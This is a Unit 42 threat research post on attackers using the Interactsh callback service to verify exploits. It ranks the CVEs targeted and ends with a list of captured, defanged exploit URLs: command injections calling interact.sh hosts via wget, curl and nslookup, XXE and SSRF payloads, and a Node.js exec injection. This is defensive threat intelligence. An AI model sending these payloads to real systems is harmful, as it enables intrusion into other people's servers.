[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  English
* [English](https://unit42.paloaltonetworks.com/exploits-interactsh/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/exploits-interactsh/)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Cybercrime](https://unit42.paloaltonetworks.com/category/cybercrime/ "Cybercrime")  
  [Cybercrime](https://unit42.paloaltonetworks.com/category/cybercrime/)

# Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 7 min read  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/product-category/advanced-dns-security/ "Advanced DNS Security")[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/product-category/advanced-threat-prevention/ "Advanced Threat Prevention")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/product-category/advanced-url-filtering/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/product-category/advanced-wildfire/ "Advanced WildFire")[![Best Practice Assessment icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Best Practice Assessment](https://unit42.paloaltonetworks.com/product-category/best-practice-assessment/ "Best Practice Assessment")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/product-category/next-generation-firewall/ "Next-Generation Firewall")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Yue Guan](https://unit42.paloaltonetworks.com/author/yue-guan/)
  * [Jin Chen](https://unit42.paloaltonetworks.com/author/jin-chen/)
  * [Leo Olson](https://unit42.paloaltonetworks.com/author/leo-olson/)
  * [Wayne Xin](https://unit42.paloaltonetworks.com/author/wayne-xin/)
  * [Daiping Liu](https://unit42.paloaltonetworks.com/author/daiping-liu/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:October 14, 2021

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Cybercrime](https://unit42.paloaltonetworks.com/category/cybercrime/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [Attack analysis](https://unit42.paloaltonetworks.com/tag/attack-analysis/)
  * [Exploit](https://unit42.paloaltonetworks.com/tag/exploit/)
  * [Exploit in the wild](https://unit42.paloaltonetworks.com/tag/exploit-in-the-wild/)
  * [Interactsh](https://unit42.paloaltonetworks.com/tag/interactsh/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/exploits-interactsh/?pdf=download&lg=en&_wpnonce=7570bbad6f "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/exploits-interactsh/?pdf=print&lg=en&_wpnonce=7570bbad6f "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Attackers%20Are%20Taking%20Advantage%20of%20the%20Open-Source%20Service%20Interactsh%20for%20Malicious%20Purposes&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fexploits-interactsh%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fexploits-interactsh%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fexploits-interactsh%2F&title=Attackers%20Are%20Taking%20Advantage%20of%20the%20Open-Source%20Service%20Interactsh%20for%20Malicious%20Purposes "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fexploits-interactsh%2F&text=Attackers%20Are%20Taking%20Advantage%20of%20the%20Open-Source%20Service%20Interactsh%20for%20Malicious%20Purposes "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fexploits-interactsh%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Attackers%20Are%20Taking%20Advantage%20of%20the%20Open-Source%20Service%20Interactsh%20for%20Malicious%20Purposes%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fexploits-interactsh%2F "Share in Mastodon")

## Executive Summary

Recently, Unit 42 has observed active exploits related to an open-source service called [Interactsh](https://github.com/projectdiscovery/interactsh). This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers -- but also by attackers -- to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.

This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we rank the exploits we've observed by popularity. In addition, we analyze Interactsh activity distribution in terms of dates and location. Lastly, we have included information about the malicious payloads for your reference.

Customers with Palo Alto Networks [Next-Generation Firewall](https://www.paloaltonetworks.com/network-security/next-generation-firewall) are protected against benign append attacks that use Interactsh.

## Interactsh Tool

Unit 42 researchers have been actively monitoring malicious activities in the wild\[[1](https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/)\]\[[2](https://unit42.paloaltonetworks.com/network-security-trends/)\]. Starting mid-April 2021, we noticed some exploit attempts with the same domain name but different subdomains in the malicious payload. After investigation, we found that the source is a [tool](https://github.com/projectdiscovery/interactsh) that can generate specific URLs for testing on DNS queries and HTTP attempts. This tool became publicly available on April 16, 2021, and we observed the first attempts to abuse it soon after, on April 18, 2021.
![Interactsh's GitHub page describes "an Open-Source Solution for Out of band Data Extraction, A tool designed to detect bugs that cause external interactions, For example - Blind SQLi, Blind CMDi, SSRF, etc."](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-9.png) Figure 1. Interactsh's GitHub Page for its open-source tool.

Figure 1 shows the GitHub page for the tool, stating that "Interactsh is an Open-Source Solution for Out of band Data Extraction, A tool designed to detect bugs that cause external interactions." In the following experiment, we interact with the web UI, which is easily found by doing a web search on "interact project discovery." When a user accesses the page, the web UI randomly generates an Interactsh link:

C4mqgxkyedf0000ar3d0gnkmaqayyyyyb\[.\]interact\[.\]sh
![We interact with an Interactsh URL using a browser to check the query trace with the Interactsh UI.](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-10.png) Figure 2. Example of using Interactsh through the Web UI.

We interact with this URL using a browser to check the query trace with the Interactsh UI, as shown in Figure 2. The UI shows the DNS query records and HTTP request for the URL, which means we successfully accessed C4mqgxkyedf0000ar3d0gnkmaqayyyyyb\[.\]interact\[.\]sh. In addition, the URL can also be used in the command line if the interactsh-client is installed.

## The Payload Interaction

Attackers and researchers can use this tool to test whether an exploit has been successful. Figure 3 shows such an example.
![The tool can be used to test whether an exploit has been successful. The screenshot shows an example.](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-11.png) Figure 3. Example of using Interactsh.

We picked an exploit attempt which used the Interactsh tool -- in this case, a [Generic IoT Device Remote Command Execution Vulnerability](https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/). The attacker sends an HTTP post request and passes a command by key parameter in the post body. Here a wget command was used to access a command and control (C2) server, which was created via the Interactsh tool. By watching whether the C2 server receives the request, it can be determined whether this exploit was successful.

## Exploits Leveraging Interactsh

This tool has already been actively used through ISP and company networks as early as April 18. We find that there are a lot of simple command injections through networks, which are related to specific CVEs. We observed a huge number of attempts, sent from a group of IP addresses and followed by the same URL, which do not seem to be a research project but rather a scanning event.

|-----------------------------------------------------------------------|--------------|-------------------------------------|----------------|
| **CVE Number**                                                        | **Severity** | **Category**                        | **Hit Counts** |
| [CVE-2017-9506](https://nvd.nist.gov/vuln/detail/CVE-2017-9506)       | Medium       | Server-Side Request Forgery (SSRF)  | 1,132          |
| [CVE-2017-12629](https://nvd.nist.gov/vuln/detail/CVE-2017-12629)     | Critical     | Remote Code Execution               | 663            |
| [CVE-2019-2767](https://nvd.nist.gov/vuln/detail/CVE-2019-2767)       | High         | Authentication Bypass (Insert Data) | 192            |
| [CVE-2021-33544](https://nvd.nist.gov/vuln/detail/CVE-2021-33544)     | High         | Remote Code Execution               | 163            |
| [CVE-2021-32819](https://nvd.nist.gov/vuln/detail/CVE-2021-32819)     | High         | Remote Code Execution               | 51             |
| [CVE-2012-1301](https://nvd.nist.gov/vuln/detail/CVE-2012-1301)       | Critical     | Server-Side Request Forgery (SSRF)  | 13             |
| [CVE-2018-1000600](https://nvd.nist.gov/vuln/detail/CVE-2018-1000600) | High         | Server-Side Request Forgery (SSRF)  | 11             |
| [CVE-2021-27905](https://nvd.nist.gov/vuln/detail/CVE-2021-27905)     | Critical     | Server-Side Request Forgery (SSRF)  | 9              |
| [CVE-2020-28188](https://nvd.nist.gov/vuln/detail/CVE-2020-28188)     | Critical     | Remote Code Execution               | 7              |
| [CVE-2018-15517](https://nvd.nist.gov/vuln/detail/CVE-2018-15517)     | High         | Server-Side Request Forgery (SSRF)  | 6              |
| [CVE-2009-4223](https://nvd.nist.gov/vuln/detail/CVE-2009-4223)       | N/A          | PHP Remote File Inclusion           | 5              |
| [CVE-2019-18394](https://nvd.nist.gov/vuln/detail/cve-2019-18394)     | Critical     | Server-Side Request Forgery (SSRF)  | 5              |
| [CVE-2021-27886](https://nvd.nist.gov/vuln/detail/CVE-2021-27886)     | Critical     | Remote Code Execution               | 3              |
| [CVE-2020-13379](https://nvd.nist.gov/vuln/detail/CVE-2020-13379)     | High         | Server-Side Request Forgery (SSRF)  | 2              |

^*Table 1. Interactsh exploit hit ranking by CVEs.*^

We collected data from URL Filtering with PAN-DB from March 7-Sept. 7 and recorded around 32,200 Interactsh hits. Focusing on vulnerability/exploit attempts, table 1 ranks the CVEs the observed traffic most commonly attempted to exploit. This means the actors behind the traffic are using Interactsh API tools to test whether their exploit attempts succeed. Each unique Interactsh URL can be thought of as a C2. Most of the exploits for the same CVEs are using multiple randomly generated Interactsh domains and scanning on different host sides.

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------|-------------------------------------|
| **CVE Number**                                                                                                                                                                                                                                                          | **Severity** | **Category**                        |
| [CVE-2021-31755](https://nvd.nist.gov/vuln/detail/CVE-2021-31755)                                                                                                                                                                                                       | Critical     | Remote Code Execution               |
| [CVE-2020-28871](https://nvd.nist.gov/vuln/detail/CVE-2020-28871)                                                                                                                                                                                                       | Critical     | Remote Code Execution               |
| [CVE-2020-25223](https://nvd.nist.gov/vuln/detail/CVE-2020-25223)                                                                                                                                                                                                       | Critical     | Remote Code Execution               |
| [CVE-2020-8813](https://nvd.nist.gov/vuln/detail/CVE-2020-8813)                                                                                                                                                                                                         | High         | Remote Code Execution               |
| [CVE-2020-7247](https://nvd.nist.gov/vuln/detail/CVE-2020-7247)                                                                                                                                                                                                         | Critical     | Remote Code Execution               |
| [CVE-2020-28188](https://nvd.nist.gov/vuln/detail/CVE-2020-28188),[CVE-2020-15568,](https://nvd.nist.gov/vuln/detail/CVE-2020-15568)[CVE-2018-13354,](https://nvd.nist.gov/vuln/detail/CVE-2018-13354)[CVE-2018-13338](https://nvd.nist.gov/vuln/detail/CVE-2018-13338) | Critical     | Remote Code Execution               |
| [CVE-2019-2616](https://nvd.nist.gov/vuln/detail/CVE-2019-2616)                                                                                                                                                                                                         | High         | Authentication Bypass (Insert Data) |
| [CVE-2018-16167](https://nvd.nist.gov/vuln/detail/CVE-2018-16167)                                                                                                                                                                                                       | High         | Remote Code Execution               |
| [CVE-2018-14839](https://nvd.nist.gov/vuln/detail/CVE-2018-14839)                                                                                                                                                                                                       | Critical     | Remote Code Execution               |
| [CVE-2016-1555](https://nvd.nist.gov/vuln/detail/CVE-2016-1555)                                                                                                                                                                                                         | Critical     | Remote Code Execution               |

^*Table 2. Other CVEs leveraged by Interactsh.*^

From our soak site (an internal network monitoring tool), we also captured some Interactsh activity, shown in Table 2, which could raise awareness of active exploits attempts.

## Interactsh Activity Distribution

We also found several DNS queries using Interactsh from [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse) data. We found three suspicious IP addresses.

[82\[.\]112\[.\]184\[.\]197](https://www.virustotal.com/gui/ip-address/82.112.184.197) is flagged as potential malware in VirusTotal, and [138\[.\]68\[.\]184\[.\]23](https://www.virustotal.com/gui/ip-address/138.68.184.23) is a phishing site. We also found [82\[.\]112\[.\]184\[.\]206, flagged](https://www.virustotal.com/gui/url/9a3c279ba0bf85ba88cd879d3925f958b430cd306bd66e3812adc41ea9851b20/detection)malicious. All three of these IP addresses have a large volume of Interactsh activity.

We analyzed all the exploits we observed that used the Interactsh tool, starting from the time it went public. Though the tool has been available online since April, we noted increasing usage of the tool in June.
![Exploits observed that used the Interactsh tool, starting from the time it went public in April.](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-12.png) Figure 4. Exploits activity distribution using the Interactsh tool.

Figure 5 shows the distribution of Interactsh activity in terms of more specific dates. Events shown on the chart could be an exploit or a single scanning action. The activity shown in Figure 5 corresponds with Figure 4, which shows increasing traffic in June.
![Exploits observed that used the Interactsh tool, starting from the time it went public in April, charted in terms of more granular date ranges.](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-13.png) Figure 5. Interactsh activity distribution.

Figure 6 shows DNS queries with the Interactsh link, distributed by location. The United Kingdom ranks No. 1, followed by Ecuador and the U.S., which rank No. 2 and No. 3.
![Observed Interactsh activity plotted in terms of location.](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-14.png) Figure 6. Interactsh activity location distribution.

## Conclusion

Even though Interactsh can be used for legitimate purposes, it is widely used by attackers to test malicious traffic. Its testing traffic therefore could be followed by a series of exploits. The trend of using third-party open-source tools to test exploits has become more popular in the last few years. It is convenient for attackers to use open-source tools, and it is hard for defenders to simply block this traffic by services/IP/server etc. To help organizations defend against malicious exploits that originate this way, we need to raise awareness about the tool.

Palo Alto Networks [Next-Generation Firewall](https://www.paloaltonetworks.com/network-security/next-generation-firewall) customers who use [Threat Prevention](https://www.paloaltonetworks.com/products/secure-the-network/subscriptions/threat-prevention), [Advanced URL Filtering](https://www.paloaltonetworks.com/products/threat-detection-and-prevention/web-security), [DNS Security](https://www.paloaltonetworks.com/products/threat-detection-and-prevention/dns-security) and [WildFire](https://www.paloaltonetworks.com/products/secure-the-network/wildfire) security subscriptions are protected against benign append attacks that use Interactsh. DNS Security has marked interact\[.\]sh as a malicious site.

We also recommend the following actions:

* Run a [Best Practice Assessment](https://www.paloaltonetworks.com/services/bpa) to identify where your configuration could be altered to improve your security posture.
* Continuously update your Next-Generation Firewalls with the latest Palo Alto Networks [Threat Prevention](https://www.paloaltonetworks.com/products/secure-the-network/subscriptions/threat-prevention) content (e.g. versions 8467 and above).

## Use Case Examples: Exploits Leveraging Interactsh

hxxp\[:\]//ip-addr/uapi-cgi/certmngr\[.\]cgi?action=createselfcert\&local=anything\&country=aa\&state=$(wget hxxp\[:\]//c44s021vkr17popa98agcrrhyneyyyd7c\[.\]interact.sh)\&organization=anything\&organizationunit=anything\&commonname=anything\&days=1\&type=anything  
(CVE-2021-33544)

hxxp\[:\]//ip-addr/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.github.config\[.\]githubtokencredentialscreator/createtokenbypassword?apiurl=hxxp\[:\]//c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr\[.\]interact.sh  
(CVE-2018-1000600)

hxxp\[:\]//ip-addr/xmlpserver/convert?xml=\<?xml+version="1.0"+?\>\<!doctype+r+\[\<!element+r+any+\>\<!entity+%+sp+system+"hxxp\[:\]//c38r5fq23aksk1ma690gcdmc6doyyahck\[.\]interact.sh/xxe.xml"\>%sp;%param1;\]\>\&\_xf=excel\&\_xl=123\&template=123  
(CVE-2019-2767)

hxxp\[:\]//ip-addr/solr/select?qt=/config#\&\&shards=127.0.0.1:8984/solq\&stream.body={"add-listener":{"event":"postcommit","name":"nuclei","class":"solr.runexecutablelistener","exe":"sh","dir":"/bin/","args":\["-c","$@|sh",".","echo","nslookup","$(whoami).c38at9vk6tb1j2mah7i0cdeca5yyybucs\[.\]interact.sh"\]}}\&wt=json\&isshard=true\&q=apple

hxxp\[:\]//ip-addr/search?q={!xmlparser v="\<!doctype a system hxxp\[:\]//c3167tzyedf0000sfc2ggbo7zoeyyyyyp\[.\]interact.sh/solr/gettingstarted/upload?stream.body={"xx":"yy"}\&commit=true""\>\<a\>\</a\>"}  
(CVE-2017-12629)

hxxp\[:\]//ip-addr/solr/db/replication?command=fetchindex\&masterurl=hxxp\[:\]//c3167tzyedf0000sfc2ggboug8cyyyyyb\[.\]interact.sh:80/xxxx\&wt=json\&httpbasicauthuser=aaa\&httpbasicauthpassword=bbb  
(CVE-2021-27905)

hxxp\[:\]//ip-addr/?defaultFilter=e')); let require = global.require || global.process.mainModule.constructor.\_load; require('child\_process').exec('curl c32s61pbq16mga0vler0cdnhgbayyyyyn\[.\]interact.sh');  
([CVE-2021-32819](https://nvd.nist.gov/vuln/detail/CVE-2021-32819))

hxxp\[:\]//ip-addr/plugins/servlet/oauth/users/icon-uri?consumeruri=hxxp\[:\]//c33mg9s2ndhfbpsj7legcddsomayyyypg\[.\]interact.sh  
(CVE-2017-9506)

hxxp\[:\]//ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq\[.\]interact.sh/port/80/secure  
(CVE-2018-15517)

hxxp\[:\]//ip-addr/api/container/command?container=\&command=;curl hxxp\[:\]//c44h3el4f1mfla5idm10crrtxqyyyjpp4\[.\]interact.sh  
(CVE-2021-27886)

hxxp\[:\]//ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze\[.\]interact.sh  
(CVE-2020-13379)

hxxp\[:\]//ip-addr/adm/krgourl.php?document\_root=hxxp\[:\]//c45luqovk0lir2vett1gcrf4iyayy468g\[.\]interact.sh  
(CVE-2009-4223)

hxxp\[:\]//ip-addr/umbraco/feedproxy.aspx?url=hxxp\[:\]//c3qsfdg4hl24te8g7rc0cd9erqyygmui6\[.\]interact.sh  
(CVE-2012-1301)

hxxp\[:\]//ip-addr/getfavicon?host=hxxp\[:\]//c3uhg4emp8vt8fqq370gcd6th6ayyy4b6\[.\]interact.sh  
(CVE-2019-18394)

![(CVE-2020-7247)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-15.png)

(CVE-2020-7247)

![(CVE-2018-16167)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-16.png)

(CVE-2018-16167)

*![(CVE-2021-31755)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-17.png)*

(CVE-2021-31755)

*![(CVE-2016-1555)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-18.png)*

(CVE-2016-1555)

*![(CVE-2019-2616)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-19.png)*

(CVE-2019-2616)

*![(CVE-2018-14839)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-20.png)*

(CVE-2018-14839)

![(CVE-2020-8813)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-21.png)

(CVE-2020-8813)

![(CVE-2020-28188 CVE-2018-13354 CVE-2018-13338 CVE-2020-15568)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-22.png)

(CVE-2020-28188 CVE-2018-13354 CVE-2018-13338 CVE-2020-15568)

*![(CVE-2020-28871)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-23.png)*

(CVE-2020-28871)

*![(CVE-2020-25223)](https://unit42.paloaltonetworks.com/wp-content/uploads/2021/10/word-image-24.png)*

(CVE-2020-25223)

hxxp\[:\]//ip-addr/rest/sharelinks/1.0/link?url=hxxps\[:\]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w\[.\]interact.sh

hxxp\[:\]//ip-addr/search.php?search=";wget+hxxp\[:\]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k\[.\]interact.sh';"

hxxp\[:\]//ip-addr/index.php?plot=;wget hxxp\[:\]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr\[.\]interact.sh
Back to top

### Tags

* [Attack analysis](https://unit42.paloaltonetworks.com/tag/attack-analysis/ "attack analysis")
* [Exploit](https://unit42.paloaltonetworks.com/tag/exploit/ "exploit")
* [Exploit in the wild](https://unit42.paloaltonetworks.com/tag/exploit-in-the-wild/ "exploit in the wild")
* [Interactsh](https://unit42.paloaltonetworks.com/tag/interactsh/ "Interactsh")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: SilverTerrier -- Nigerian Business Email Compromise](https://unit42.paloaltonetworks.com/silverterrier-nigerian-business-email-compromise/ "SilverTerrier – Nigerian Business Email Compromise")

### Table of Contents

* 

### Related Articles

* [In-Depth Analysis of July 2023 Exploit Chain Featuring CVE-2023-36884 and CVE-2023-36584](https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/ "article - table of contents")
* [Network Security Trends: November 2022-January 2023](https://unit42.paloaltonetworks.com/network-security-trends-nov-jan/ "article - table of contents")
* [Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats](https://unit42.paloaltonetworks.com/realtek-sdk-vulnerability/ "article - table of contents")

## Related Cybercrime Resources

![Pictorial representation of Russian global webmail espionage campaign. A digital illustration of a world map in a network style, highlighting continents with glowing lines and connectivity points in a red and blue theme.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/07/06_Nation-State-cyberattacks_1920x900-1-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) July 23, 2026 [#### Russian Global Webmail Espionage](https://unit42.paloaltonetworks.com/russian-webmail-espionage/)

* [CL-STA-1114](https://unit42.paloaltonetworks.com/tag/cl-sta-1114/ "CL-STA-1114")

* [JavaScript](https://unit42.paloaltonetworks.com/tag/javascript/ "JavaScript")

* [Javascript injection](https://unit42.paloaltonetworks.com/tag/javascript-injection/ "javascript injection")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/russian-webmail-espionage/ "Russian Global Webmail Espionage")  
  ![Pictorial representation of a woman standing in a server room holding a laptop that projects a digital code overlay.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/06_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) May 28, 2026 [#### 2026 World Cup: Discussing The World's Biggest Game's Attack Surface](https://unit42.paloaltonetworks.com/fifa-world-cup-attack-surface/)

* [Fiddling Scorpius](https://unit42.paloaltonetworks.com/tag/fiddling-scorpius/ "Fiddling Scorpius")

* [Fighting Ursa](https://unit42.paloaltonetworks.com/tag/fighting-ursa/ "Fighting Ursa")

* [Muddled Libra](https://unit42.paloaltonetworks.com/tag/muddled-libra/ "Muddled Libra")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/fifa-world-cup-attack-surface/ "2026 World Cup: Discussing The World’s Biggest Game’s Attack Surface")  
  ![Pictoral representation of a man holding a cellphone with a bokeh skyline in the background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/05_Listicle_Category_1505x922-718x440.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) May 27, 2026 [#### Out of the Crypt: The Evolving Cyber Extortion Economy](https://unit42.paloaltonetworks.com/cyber-extortion-economy/)

* [Bling Libra](https://unit42.paloaltonetworks.com/tag/bling-libra/ "Bling Libra")

* [Extortion](https://unit42.paloaltonetworks.com/tag/extortion/ "Extortion")

* [Frontier AI](https://unit42.paloaltonetworks.com/tag/frontier-ai/ "Frontier AI")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/cyber-extortion-economy/ "Out of the Crypt: The Evolving Cyber Extortion Economy")  
  ![Pictorial representation of the APT Boggy Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/Boggy-Serpens-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) March 16, 2026 [#### Boggy Serpens Threat Assessment](https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/tag/advanced-persistent-threat/ "Advanced Persistent Threat")

* [Boggy Serpens](https://unit42.paloaltonetworks.com/tag/boggy-serpens/ "Boggy Serpens")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/ "Boggy Serpens Threat Assessment")  
  ![Pictorial representation of Muddled Libra, aka Scattered Spider. A vibrant illustration of the Libra zodiac sign, featuring a stylized balance scale overlaid with a prominent Libra symbol. The background is a starry night sky with shades of purple and blue, suggesting a cosmic theme.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/03-1-Muddle-Libra-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)Threat Actor Groups](https://unit42.paloaltonetworks.com/category/threat-actor-groups/) February 10, 2026 [#### A Peek Into Muddled Libra's Operational Playbook](https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/)

* [Muddled Libra](https://unit42.paloaltonetworks.com/tag/muddled-libra/ "Muddled Libra")

* [PowerShell](https://unit42.paloaltonetworks.com/tag/powershell/ "PowerShell")

* [Scattered Spider](https://unit42.paloaltonetworks.com/tag/scattered-spider/ "Scattered Spider")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/ "A Peek Into Muddled Libra’s Operational Playbook")  
  ![Pictorial representation of a group of individuals discussing an idea with a whiteboard.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/02_Listicle_Overview_1920x900-786x368.jpg)  
